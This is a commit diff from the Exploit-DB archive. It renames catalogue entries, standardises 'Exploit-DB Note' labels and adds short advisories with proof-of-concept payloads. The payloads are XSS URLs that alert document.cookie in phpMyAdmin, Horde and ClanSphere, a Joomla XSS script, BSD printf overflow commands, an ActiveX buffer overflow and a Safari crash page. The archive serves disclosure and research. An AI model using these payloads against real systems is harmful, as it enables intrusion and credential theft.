Updated 04_29_2014

files.csv

@@ -12688,7 +12688,7 @@ id,file,description,date,author,platform,type,port
 14476,platforms/php/webapps/14476.txt,"Joomla Component (com_joomla-visites) Remote File inclusion Vulnerability",2010-07-26,Li0n-PaL,php,webapps,0
 14477,platforms/windows/dos/14477.txt,"Media Player Classic - Heap Overflow/DoS Vulnerability",2010-07-26,"Praveen Darshanam",windows,dos,0
 14481,platforms/php/webapps/14481.txt,"Joomla Component TTVideo 1.0 - SQL Injection Vulnerability",2010-07-27,"Salvatore Fresta",php,webapps,0
-14482,platforms/windows/local/14482.py,"QQPlayer smi File Buffer Overflow Exploit",2010-07-27,"Lufeng Li",windows,local,0
+14482,platforms/windows/local/14482.py,"QQPlayer 2.3.696.400p1 - smi File Buffer Overflow Exploit",2010-07-27,"Lufeng Li",windows,local,0
 14483,platforms/php/webapps/14483.pl,"PunBB <= 1.3.4 & Pun_PM <= 1.2.6 - Remote Blind SQL Injection Exploit",2010-07-27,Dante90,php,webapps,0
 14484,platforms/windows/dos/14484.html,"IE6 / 7 Remote Dos vulnerability",2010-07-27,"Richard leahy",windows,dos,0
 14485,platforms/php/webapps/14485.txt,"nuBuilder 10.04.20 Local File Inclusion Vulnerability",2010-07-27,"John Leitch",php,webapps,0
@@ -13574,7 +13574,7 @@ id,file,description,date,author,platform,type,port
 15659,platforms/php/webapps/15659.txt,"Contenido CMS 4.8.12 XSS Vulnerabilities",2010-12-02,"High-Tech Bridge SA",php,webapps,0
 15660,platforms/php/webapps/15660.txt,"etomite 1.1 - Multiple Vulnerabilities",2010-12-02,"High-Tech Bridge SA",php,webapps,0
 15661,platforms/asp/webapps/15661.txt,"Ananda Real Estate 3.4 (list.asp) Multiple SQL Injection",2010-12-02,underground-stockholm.com,asp,webapps,0
-15662,platforms/linux/remote/15662.txt,"ProFTPD 1.3.3c compromised source remote root Trojan",2010-12-02,anonymous,linux,remote,21
+15662,platforms/linux/remote/15662.txt,"ProFTPD 1.3.3c - Compromised Source Remote Root Trojan",2010-12-02,anonymous,linux,remote,21
 15663,platforms/windows/local/15663.py,"MediaCoder <= 0.7.5.4797 .m3u Buffer Overflow (SEH)",2010-12-02,"Oh Yaw Theng",windows,local,0
 15664,platforms/ios/remote/15664.txt,"iOS iFTPStorage <= 1.3 - Directory Traversal",2010-12-03,XEL,ios,remote,0
 15665,platforms/asp/webapps/15665.txt,"Easy Travel Portal 2 - (travelbycountry.asp) SQL Injection Vulnerability",2010-12-03,"Ulrik Persson",asp,webapps,0
@@ -25534,7 +25534,7 @@ id,file,description,date,author,platform,type,port
 28503,platforms/php/webapps/28503.txt,"TextAds error.php error Parameter XSS",2006-09-09,s3rv3r_hack3r,php,webapps,0
 28504,platforms/php/local/28504.php,"PHP 3-5 Ini_Restore() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability",2006-09-09,"Maksymilian Arciemowicz",php,local,0
 28505,platforms/php/webapps/28505.txt,"PHProg 1.0 - Multiple Input Validation Vulnerabilities",2006-09-11,cdg393,php,webapps,0
-28507,platforms/aix/local/28507.sh,"IBM AIX 6.1 / 7.1 - Local root Privilege Escalation",2013-09-24,"Kristian Erik Hermansen",aix,local,0
+28507,platforms/aix/local/28507.sh,"IBM AIX 6.1 / 7.1 - Local Root Privilege Escalation",2013-09-24,"Kristian Erik Hermansen",aix,local,0
 28508,platforms/hardware/remote/28508.rb,"Raidsonic NAS Devices Unauthenticated Remote Command Execution",2013-09-24,metasploit,hardware,remote,0
 28509,platforms/php/webapps/28509.txt,"XHP CMS 0.5.1 Index.PHP Cross-Site Scripting Vulnerability",2006-09-11,"HACKERS PAL",php,webapps,0
 28510,platforms/php/webapps/28510.txt,"PHProg 1.0 index.php album Parameter XSS",2006-09-11,cdg393,php,webapps,0
@@ -29742,7 +29742,7 @@ id,file,description,date,author,platform,type,port
 32996,platforms/multiple/remote/32996.txt,"Nortel Contact Center Manager Administration Password Disclosure Vulnerability",2009-05-14,"Bernhard Muller",multiple,remote,0
 32997,platforms/windows/remote/32997.pl,"Acunetix 8 build 20120704 - Remote Stack Based Overflow",2014-04-24,An7i,windows,remote,0
 32998,platforms/multiple/remote/32998.c,"Heartbleed OpenSSL - Information Leak Exploit (2) - DTLS Support",2014-04-24,"Ayman Sagy",multiple,remote,0
-32999,platforms/php/webapps/32999.py,"Bonefire v.0.7.1 - Reinstall Admin Account Exploit",2014-04-24,"Mehmet Ince",php,webapps,0
+32999,platforms/php/webapps/32999.py,"Bonefire 0.7.1 - Reinstall Admin Account Exploit",2014-04-24,"Mehmet Ince",php,webapps,0
 33000,platforms/php/webapps/33000.txt,"Cacti <= 0.8.7 'data_input.php' Cross Site Scripting Vulnerability",2009-05-15,fgeek,php,webapps,0
 33001,platforms/php/webapps/33001.ssh,"Kingsoft Webshield 1.1.0.62 Cross Site scripting and Remote Command Execution Vulnerability",2009-05-20,inking,php,webapps,0
 33002,platforms/php/webapps/33002.txt,"Profense 2.2.20/2.4.2 Web Application Firewall Security Bypass Vulnerabilities",2009-05-20,EnableSecurity,php,webapps,0
@@ -29798,3 +29798,14 @@ id,file,description,date,author,platform,type,port
 33054,platforms/hardware/remote/33054.txt,"Cisco Adaptive Security Appliance 8.x Web VPN FTP or CIFS Authentication Form Phishing Vulnerability",2009-05-24,"David Byrne",hardware,remote,0
 33055,platforms/hardware/remote/33055.html,"Cisco ASA Appliance 8.x WebVPN DOM Wrapper Cross Site Scripting Vulnerability",2009-05-24,"Trustwave's SpiderLabs",hardware,remote,0
 33056,platforms/windows/dos/33056.pl,"Symantec Endpoint Protection Manager 12.1.x - SEH Overflow POC",2014-04-27,st3n,windows,dos,0
+33057,platforms/php/webapps/33057.txt,"Aardvark Topsites PHP 5.2 'index.php' Cross Site Scripting Vulnerability",2009-05-26,anonymous,php,webapps,0
+33058,platforms/multiple/dos/33058.txt,"Multiple BSD Distributions 'gdtoa/misc.c' Memory Corruption Vulnerability",2009-05-26,"Maksymilian Arciemowicz",multiple,dos,0
+33059,platforms/windows/dos/33059.smpl,"BaoFeng Storm 3.9.62 Playlist File Buffer Overflow Vulnerability",2009-05-28,Jambalaya,windows,dos,0
+33060,platforms/php/webapps/33060.txt,"phpMyAdmin <= 3.3.0 'db' Parameter Cross Site Scripting Vulnerability",2009-05-30,r0t,php,webapps,0
+33061,platforms/php/webapps/33061.php,"Joomla! 1.5.x Cross Site Scripting and Information Disclosure Vulnerabilities",2009-06-01,"Juan Galiana Lara",php,webapps,0
+33062,platforms/windows/dos/33062.txt,"Apple Safari 4 'reload()' Denial of Service Vulnerability",2009-06-02,SkyOut,windows,dos,0
+33063,platforms/windows/remote/33063.txt,"Microsoft Internet Explorer 6.0 'javascript:' URI in 'Refresh' Header Cross-Site Scripting Vulnerability",2009-06-03,MustLive,windows,remote,0
+33064,platforms/multiple/remote/33064.txt,"Google Chrome <= 0.3.154 'javascript:' URI in 'Refresh' Header Cross-Site Scripting Vulnerability",2009-06-03,MustLive,multiple,remote,0
+33065,platforms/php/webapps/33065.txt,"Horde 3.1 'Passwd' Module Cross Site Scripting Vulnerability",2009-06-05,anonymous,php,webapps,0
+33066,platforms/windows/remote/33066.html,"Avax Vector 1.3 'avPreview.ocx' ActiveX Control Buffer Overflow Vulnerability",2009-06-06,Satan_HackerS,windows,remote,0
+33068,platforms/php/webapps/33068.txt,"ClanSphere 2009 'text' Parameter Cross Site Scripting Vulnerability",2009-06-06,"599eme Man",php,webapps,0

platforms/aix/local/28507.sh

@@ -1,5 +1,4 @@
-#
-# EDB Note: Screenshot provided by exploit author
+# Exploit-DB Note: Screenshot provided by exploit author
 #
 
 #!/bin/sh

platforms/cgi/webapps/15130.sh

@@ -10,7 +10,7 @@
 # Internal networking information(system_gateway, system_ip, system_netmask, system_primary_dns_server, system_secondary_dns_server)
 #
 #
-# EDB Notes:
+# Exploit-DB Notes:
 # If /cgi-mod/view_help.cgi returns a 404, try /cgi-bin/view_help.cgi instead. You should be able to determine this manually since Barracuda automatically redirects you to the login page anyway.
 
 if [ $# != 1 ]; then

platforms/linux/local/28657.c

@@ -1,6 +1,6 @@
 /*
  * 
- * EDB Note: Reportedly does not work. See output at the bottom of the entry.
+ * Exploit-DB Note: Reportedly does not work. See output at the bottom of the entry.
  *
  * $FILE: bug-mangle.c
  *

platforms/linux/remote/29734.txt

@@ -91,6 +91,6 @@ Ruben Garrote Garc
 rubengarrote [at] gmail [dot] com
 http://boken00.blogspot.com
 
-## EDB Note:
+## Exploit-DB Note:
 # It seems 3.70 version currently available for download
 # has been patched against this. Earlier versions are probably vulnerable to this.

platforms/linux/webapps/30085.txt

@@ -8,7 +8,7 @@
 # CVE : No CVE, no patch just 0Day
 # State : Critical
 
-# Mirror: http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip
+# Exploit-DB mirror: http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip
 
 ---------------Description-----------------
 

platforms/multiple/dos/33058.txt

@@ -0,0 +1,29 @@
+source: http://www.securityfocus.com/bid/35510/info
+
+Multiple BSD distributions are prone to a memory-corruption vulnerability because the software fails to properly bounds-check data used as an array index.
+
+Attackers may exploit this issue to execute arbitrary code within the context of affected applications.
+
+The following are vulnerable:
+
+OpenBSD 4.5
+NetBSD 5.0
+FreeBSD 6.4 and 7.2
+
+Other software based on the BSD code base may also be affected. 
+
+The following proof-of-concept shell commands are available:
+
+printf %1.262159f 1.1
+printf %11.2109999999f
+printf %11.2009999999f
+printf %11.2009999999f
+
+The following proof-of-concept Perl script is available:
+
+#!/usr/local/bin/perl
+printf "%0.4194310f", 0x0.0x41414141;
+
+The following proof-of-concept J program is available:
+
+cxib=0.<?php echo str_repeat("1",296450); ?> 

platforms/multiple/dos/4601.txt

@@ -1,6 +1,6 @@
 Ubuntu 6.06 DHCPd bug Remote Denial of Service Exploit
 Author: RoMaNSoFt <roman@rs-labs.com>
 
-http://www.exploit-db.com/sploits/11022007-DoS-CVE-2007-5365.tgz
+Exploit-DB mirror: http://www.exploit-db.com/sploits/11022007-DoS-CVE-2007-5365.tgz
 
 # milw0rm.com [2007-11-02]

platforms/multiple/remote/13787.txt

@@ -1,4 +1,5 @@
-# EDB Note - Live POC originally found at http://qoop.org/security/poc/cve-2010-1297/
+# Exploit-DB Note - Live POC originally found at http://qoop.org/security/poc/cve-2010-1297/
+
 # File is malicious! Taken from the wild! Beware!
 # To decrypt the file:
 # openssl aes-256-cbc -d -a -in adobe-0day-2010-1297.tar.enc -out adobe-0day-2010-1297.tar

platforms/multiple/remote/33064.txt

@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/35572/info
+
+
+Google Chrome is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to execute arbitrary script code in the context of the user running the application and to steal cookie-based authentication credentials and other sensitive data that may aid in further attacks.
+
+Chrome 1.0.154.48 is vulnerable; other versions may also be affected.
+
+With request to script at web site:
+
+http://www.example.com/script.php?param=javascript:alert(document.cookie)
+
+Which returns in answer the refresh header:
+
+refresh: 0; URL=javascript:alert(document.cookie)

platforms/php/webapps/10931.txt

@@ -6,7 +6,7 @@
 # [+] Dork : powered by x7 chat 1.3.6b
 #####################################################
 
-##### Notes from the exploit-db.com team ############
+##### Exploit-DB Notes ############
 # Vendor has already addressed this issue and even provided a solution in Docs/INSTALL.txt:
 # "After finishing the online setup delete the file install.php.  If you do not it will be 
 # possible for anyone to create an administrator account on your chat server."

platforms/php/webapps/12617.txt

@@ -27,5 +27,5 @@ Test Environment:
 
 ====================================================================
 Download the following file for more instructions and exploits:
-====================================================================
-http://www.exploit-db.com/sploits/file_thingie_v255_Jeremiah.zip
+Exploit-DB mirror: http://www.exploit-db.com/sploits/file_thingie_v255_Jeremiah.zip
+====================================================================

platforms/php/webapps/14198.txt

@@ -103,7 +103,7 @@ Response: Topics started by admin:$P$B9TLvhE1l2swasFRlOcABmbhZteCCo.
 (0 Matches Found)
 
 ================================
-EDB Notes:
+Exploit-DB Notes:
 ================================
 Tested platform:
 * Ubuntu Linux version 2.6.32-22-generic (buildd@palmer) (gcc version 4.4.3 (Ubuntu 4.4.3-4ubuntu5) )

platforms/php/webapps/17165.py

@@ -9,15 +9,12 @@
 #
 #  From tinybb.net
 #  -------------------------
-#  "TinyBB is a free, simple bulletin board script. TinyBB's community
-is slowly growing and the number
-#   of installs is slowly rising. TinyBB's software is 100% free and so
-are our official add-ons."
+#  "TinyBB is a free, simple bulletin board script. TinyBB's community is slowly growing and the number
+#   of installs is slowly rising. TinyBB's software is 100% free and so are our official add-ons."
 # 
 #  Sql Injection [Fixed]
 #  -----------------------
-#  The  vulnerability exist in /inc/viewthread.php file at line 3. As
-you can see below the $_GET['post'] parameter isn't
+#  The  vulnerability exist in /inc/viewthread.php file at line 3. As you can see below the $_GET['post'] parameter isn't
 #  properly sanitized.
 #
 #   $check_thread = mysql_query("SELECT * FROM `tinybb_threads` WHERE
@@ -25,20 +22,17 @@ you can see below the $_GET['post'] parameter isn't
 #
 #  Path Disclosure [Not fixed]
 #  --------------------
-#   A remote user can access these files to cause the system to display
-an error message that indicates the installation  #   path.
+#   A remote user can access these files to cause the system to display an error message that indicates the installation  #   path.
 #       1-  http://host/inc/login.php
 #       2-  http://host/inc/categories.php
 #
 #swami@swami-desktop:~/Documents/py$ ./tinybb.py
 #
-# [+] TinyBB thread url:
-http://192.168.2.6/tinybb/index.php?page=thread&post=444709648
+# [+] TinyBB thread url: http://192.168.2.6/tinybb/index.php?page=thread&post=444709648
 # [?] Set up a Proxy ? [y/n] y
 # [+] Proxy ip:port: 127.0.0.1:3128
 # [+] Proxy is found to be working
-# [+] Testing url:
-http://192.168.2.6/tinybb/index.php?page=thread&post=444709648
+# [+] Testing url: http://192.168.2.6/tinybb/index.php?page=thread&post=444709648
 # [+] Url vulnerable: YES
 # [+] Users into the db: 1
 # [+] Executing blind sql injection, this will take time ...

platforms/php/webapps/30213.txt

@@ -1,6 +1,6 @@
 ###########################################################
 
-EDB Note: Screenshot provided by exploit author.
+Exploit-DB Note: Screenshot provided by exploit author.
 
 ###########################################################
 [~] Exploit Title: eFront v3.6.14 (build 18012) -Stored XSS in multiple

platforms/php/webapps/31015.txt

@@ -146,4 +146,4 @@ sleep(1);
 print "To Exploit [http://site/languages/deutsch.php?cmd= COMMAND] \n";
 
 
-#EDB note: Actually couldn't get the SQLi to trigger the CSRF does work.
+# Exploit-DB Note: Actually couldn't get the SQLi to trigger the CSRF does work.

platforms/php/webapps/33057.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/35506/info
+
+Aardvark Topsites PHP is prone to a cross-site scripting vulnerability.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
+
+Aardvark Topsites PHP 5.2.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?a=search&q=psstt+securityâ~@~]><a+href%3Dhttp%3A%2F%2Fwebsec.id3as.com>Web-Application-Security 

platforms/php/webapps/33060.txt

@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/35531/info
+
+phpMyAdmin is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+The following versions are affected:
+
+phpMyAdmin 3.2.0.1
+phpMyAdmin 3.2.1-dev
+phpMyAdmin 3.3.0-dev
+phpMyAdmin 2.11.10-dev
+phpMyAdmin 3.2.0-rc1
+
+Other versions may also be affected. 
+
+http://www.example.com/MAINT_3_2_0/index.php?db=%22%3E%27%3E%3Cscript%3Ealert%28%2Fr0t%2F%29%3C%2Fscript%3E&token=f70d8ec4305c5a877f56c14554aced10

platforms/php/webapps/33061.php

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/35544/info
+
+Joomla! is prone to multiple cross-site scripting and information-disclosure vulnerabilities.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and obtain sensitive information.
+
+These issues affect versions prior to 1.5.12.
+
+/* PoC: XSS Joomla 1.5.11 Juan Galiana Lara Internet Security Auditors Jun 2009 */ /* config */ $site='localhost'; $path='/joomla-1.5.11'; $cookname='d85558a8cf943386aaa374896bfd3d99'; $cookvalue='4ab56fdd83bcad86289726aead602699'; class cURL { var $headers; var $user_agent; var $compression; var $cookie_file; var $proxy; /* evil script */ var $xss='alert("PWN PWN PWN: " + document.cookie);'; function cURL($cookies=TRUE,$cookie='cookies.txt',$compression='gzip',$proxy='') { $this->headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'; $this->headers[] = 'Connection: Keep-Alive'; $this->headers[] = 'Content-type: application/x-www-form-urlencoded;charset=UTF-8'; $this->headers[] = 'Referer: ">get('http://' . $site . $path . '/index.php?option=com_content&view=article&layout=form'); /* let's execute some javascript.. }:-)*/ echo $c; ?> 

platforms/php/webapps/33065.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/35573/info
+
+The Horde 'Passwd' module is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Versions prior to Horde 'Passwd' 3.1.1 are vulnerable. 
+
+http://www.example.com/horde/passwd/main.php?backend="><script>alert('XSS')</script>&userid=stevejobs&return_to=&oldpassword=foo&newpassword0=foo&newpassword1=foo&submit=Change%20Password 

platforms/php/webapps/33068.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/35605/info
+
+ClanSphere is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+ClanSphere 2009.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?mod=search&action=list&text="'><script>alert('xss')</script>&where=0&submit=Suchen 

platforms/windows/dos/12080.txt

@@ -19,7 +19,7 @@ DoS("DoS");
 
 -------------------------
 
-PoC: http://www.exploit-db.com/sploits/12080.pdf
+Exploit-DB mirror: http://www.exploit-db.com/sploits/12080.pdf
 
 Regards
 

platforms/windows/dos/12518.pl

@@ -3,7 +3,7 @@
 # Tested on: Windows XP SP2
 
 #####################################################################
-## EDB Notes:
+## Exploit-DB Notes:
 ## Tested under 32-bit Windows XP SP3 ENG, MS Paint crashes.
 ## However, please note this exploit might not actually be related
 ## to MS10-005. Thanks to Yaniv Miron.

platforms/windows/dos/12655.txt

@@ -23,7 +23,7 @@ Anti Lammer Enconde
 <script type="text/javascript">document.write('\u003C\u0062\u006F\u0064\u0079\u0020\u006F\u006E\u006C\u006F\u0061\u0064\u003D\u0022\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003A\u0062\u006C\u006F\u0063\u006B\u0028\u0029\u003B\u0022\u003E\u003C\u002F\u0062\u006F\u0064\u0079\u003E\u000D\u0020\u000D\u003C\u0073\u0063\u0072\u0069\u0070\u0074\u003E\u000D\u0020\u000D\u0066\u0075\u006E\u0063\u0074\u0069\u006F\u006E\u0020\u0062\u006C\u006F\u0063\u006B\u0028\u0029\u0020\u007B\u000D\u0020\u000D\u0076\u0061\u0072\u0020\u0062\u0020\u003D\u0020\u0027\u005C\u0078\u0034\u0043\u005C\u0078\u0045\u0046\u005C\u0078\u0031\u0033\u005C\u0078\u0030\u0030\u0027\u003B\u000D\u0066\u006F\u0072\u0020\u0028\u0061\u0020\u003D\u0030\u003B\u0061\u003C\u0039\u0039\u0039\u0039\u0039\u0039\u0039\u0039\u0039\u0039\u0039\u003B\u0061\u002B\u002B\u0029\u0020\u007B\u000D\u0062\u002B\u003D\u0062\u002B\u0027\u005C\u0078\u0034\u0043\u005C\u0078\u0045\u0046\u005C\u0078\u0031\u0033\u005C\u0078\u0030\u0030\u0027\u003B\u000D\u0061\u006C\u0065\u0072\u0074\u0028\u0027\u003C\u0068\u0074\u006D\u006C\u003E\u003C\u006D\u0061\u0072\u0071\u0075\u0065\u0065\u003E\u003C\u0068\u0031\u003E\u0027\u002B\u0062\u002B\u0062\u0029\u003B\u000D\u000D\u007D\u000D\u0020\u000D\u007D\u000D\u0020\u000D\u003C\u002F\u0073\u0063\u0072\u0069\u0070\u0074\u003E\u000D\u000D');</script>
 
 ==================================================
-EDB Notes - Decoded Version:
+Exploit-DB Notes - Decoded Version:
 ==================================================
 
 <body onload="javascript:block();"></body>

platforms/windows/dos/14525.pl

@@ -7,7 +7,7 @@
 #
 # thanks TCT , DGM8
 #
-# EDB Notes:
+# Exploit-DB Notes:
 # 0012B448   00410041  A.A.  jaangle.00410041
 # 0012B44C   00410041  A.A.  Pointer to next SEH record
 # 0012B450   00410041  A.A.  SE handler

platforms/windows/dos/15167.txt

@@ -55,5 +55,5 @@ while(<$sock>) {
 }
 
 
-EDB Notes:
+Exploit-DB Notes:
 In our tests, a specific setting has to be modified in metabase.xml in order to trigger the exhaustion.  Tested systems: Windows Server 2003 Standard SP2, Windows Server 2003 Standard SP1, Windows Server 2003 Standard SP0

platforms/windows/dos/15708.html

@@ -14,7 +14,7 @@
 </code>
 
 
-EDB Notes:
+Exploit-DB Notes:
 * Original credit goes to an unidentified researcher using WooYun anonymous account "???".
 WooYun is a connection platform for vendors and security researchers:
 http://www.wooyun.org/bugs/wooyun-2010-0885

platforms/windows/dos/22402.txt

@@ -57,4 +57,4 @@ User mode write access violations that are not near NULL are exploitable.
 Proof of concept included. 
 
 http://www21.zippyshare.com/v/83302158/file.html
-http://www.exploit-db.com/sploits/22402.rar
+Exploit-DB mirror: http://www.exploit-db.com/sploits/22402.rar

platforms/windows/dos/22464.txt

@@ -37,4 +37,4 @@ ntdll!RtlEnterCriticalSection+0x8:
 Proof of concept included. 
 
 http://www42.zippyshare.com/v/23669551/file.html
-http://www.exploit-db.com/sploits/22464.pdf
+Exploit-DB mirror: http://www.exploit-db.com/sploits/22464.pdf

platforms/windows/dos/23107.txt

@@ -75,4 +75,4 @@ User mode write access violations that are not near NULL are exploitable.
 ################################################################################
 Proof of concept included. 
 http://www21.zippyshare.com/v/83302158/file.html 
-http://www.exploit-db.com/sploits/23107.zip
+Exploit-DB mirror: http://www.exploit-db.com/sploits/23107.zip

platforms/windows/dos/23201.txt

@@ -65,6 +65,6 @@ User mode DEP access violations are exploitable.
 ################################################################################
 Proof of concept included.
 
-http://www39.zippyshare.com/v/91522221/file.html
-http://www.exploit-db.com/sploits/23201.rar
+Exploit-DB mirror: http://www39.zippyshare.com/v/91522221/file.html
+Exploit-DB mirror: http://www.exploit-db.com/sploits/23201.rar
 

platforms/windows/dos/24930.txt

@@ -107,7 +107,7 @@ POC Exploit code:
 # !/usr/bin/python
 
 filename = "Evil.m3u"
-# EDB note: fixed file extension as original script created a MP3
+# Exploit-DB Note: fixed file extension as original script created a MP3
 # instead of M3U
 
 buffer = "\x41" * 220

platforms/windows/dos/33059.smpl

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/35512/info
+
+BaoFeng Storm is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input.
+
+Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
+
+Storm 3.09.62 is vulnerable; other versions may also be affected. 
+
+<playlist><item name="2.GIF" source="C:\Documents and
+Settings\Linlin\????\2.GIF" duration="0"/><item name="0001.gif"
+source="C:\Documents and
+Settings\Linlin\????\rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhgggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeedddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaawwwwwwwwwwwwwjjjjjjjjjjjjjjjjjpppppppppppppppptttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy.gif"
+duration="0"/></playlist> 

platforms/windows/dos/33062.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/35555/info
+
+Apple Safari is prone to a denial-of-service vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
+Given the nature of this issue, the attacker may also be able to run arbitrary code, but this has not been confirmed.
+
+Safari 4.0 and 4.0.1 are vulnerable; other versions may also be affected.
+
+<html> <body> <script src="empty.js"></script> <script> try { crashSafari(); } catch(e) { setTimeout("location.reload();",42); prompt('apple culpa? comment:'); } </script> </body> </html> 

platforms/windows/dos/4335.txt

@@ -5,6 +5,6 @@ Yahoo! Messenger 8.1.0.413 (webcam) Remote Crash Exploit
 3.when the otherside accept the invatation , inject the dll to local yahoo! messenger 8.1.0.413 's process.
 4 . the otherside's yahoo! messenger will be crashed.
 
-http://www.exploit-db.com/sploits/08292007-expyahoo.rar
+Exploit-DB mirror: http://www.exploit-db.com/sploits/08292007-expyahoo.rar
 
 # milw0rm.com [2007-08-29]

platforms/windows/local/14158.pl

@@ -1,7 +1,7 @@
 #By Madjix Dz8[at]hotmail[dot]com
 #Greets: myself for find the bug :)
 #
-# Notes from EDB:
+# Exploit-DB Notes:
 # 000DBF98 41414141 AAAA
 # 000DBF9C 41414141 AAAA
 # 000DBFA0 41414141 AAAA

platforms/windows/local/14482.py

@@ -8,7 +8,7 @@
 # Platform: Windows XPSP3 Chinese Simplified
 # Tested: QQPlayer 2.3.696.400p1
 # Vulnerable: QQPlayer<=2.3.696.400p1
-# EDB Notes: A different SEH addr might be necessary for XP SP3 ENG.
+# Exploit-DB Notes: A different SEH addr might be necessary for XP SP3 ENG.
 #            Make sure EAX aligns to the shellcode before decoding.
 # Payload=calc.exe
 #

platforms/windows/local/14681.py

@@ -10,7 +10,7 @@
 # Reference:	http://www.exploit-db.com/exploits/14676/
 # Usage:	Import File, Select It, Click Play, Calc.
 #
-# EDB Notes:
+# Exploit-DB Notes:
 # This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
 # EIP overwrite which is operating system specific.
 #

platforms/windows/local/24872.txt

@@ -1,4 +1,4 @@
-#E-DB Note: Vuln still in 6.0.3410 as well as 'Photodex ProShow Gold'
+## Exploit-DB Note: Vuln still in 6.0.3410 as well as 'Photodex ProShow Gold'
 
 Inshell Security Advisory
 http://www.inshell.net

platforms/windows/local/29549.pl

@@ -16,7 +16,7 @@
 # Due to unicode conversion this is a venetian shellcode exploit
 # To exploit simply open the created m3u file
 ##############################################################################
-# EDB Note:
+# Exploit-DB Note:
 # This also affects version 5.7 of the application
 
 my $buffsize = 5000; # sets buffer size for consistent sized payload

platforms/windows/local/32737.pl

@@ -1,4 +1,4 @@
-## EDB Note, XPSP3 - my $eip = pack('V',0x7c868667); #jmp ESP on kernel32.dll 
+## Exploit-DB Note: XPSP3 - my $eip = pack('V',0x7c868667); #jmp ESP on kernel32.dll 
 
 
 

platforms/windows/remote/15809.html

@@ -1,4 +1,4 @@
-EDB Notes:
+Exploit-DB Notes:
 Original credit goes to "????" via WooYun:
 http://www.wooyun.org/bugs/wooyun-2010-01006
 

platforms/windows/remote/33063.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/35570/info
+
+Microsoft Internet Explorer is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to execute arbitrary script code in the context of the user running the application and to steal cookie-based authentication credentials and other sensitive data that may aid in further attacks.
+
+Internet Explorer 6 is vulnerable; other versions may also be affected.
+
+With request to script at web site:
+
+http://www.example.com/script.php?param=javascript:alert(document.cookie)
+
+Which returns in answer the refresh header:
+
+refresh: 0; URL=javascript:alert(document.cookie)

platforms/windows/remote/33066.html

@@ -0,0 +1,24 @@
+source: http://www.securityfocus.com/bid/35583/info
+
+Avax Vector is prone to a remote buffer-overflow vulnerability.
+
+Attackers can exploit this issue to execute arbitrary code within the context of an application that uses the ActiveX control (typically Internet Explorer). Failed exploit attempts will result in a denial-of-service condition.
+
+Avax Vector ActiveX 1.3 is vulnerable; other versions may also be affected. 
+
+<html>
+<object classid='clsid:9589AEC9-1C2D-4428-B7E8-63B39D356F9C' id='CCRP' ></object>
+<script language='vbscript'>
+
+argCount   = 1
+
+arg1=String(10260, "A")
+
+target.PrinterName = arg1
+
+</script>
+
+<script language='javascript'>
+ document.location.reload()
+</script>
+

platforms/windows/remote/4948.txt

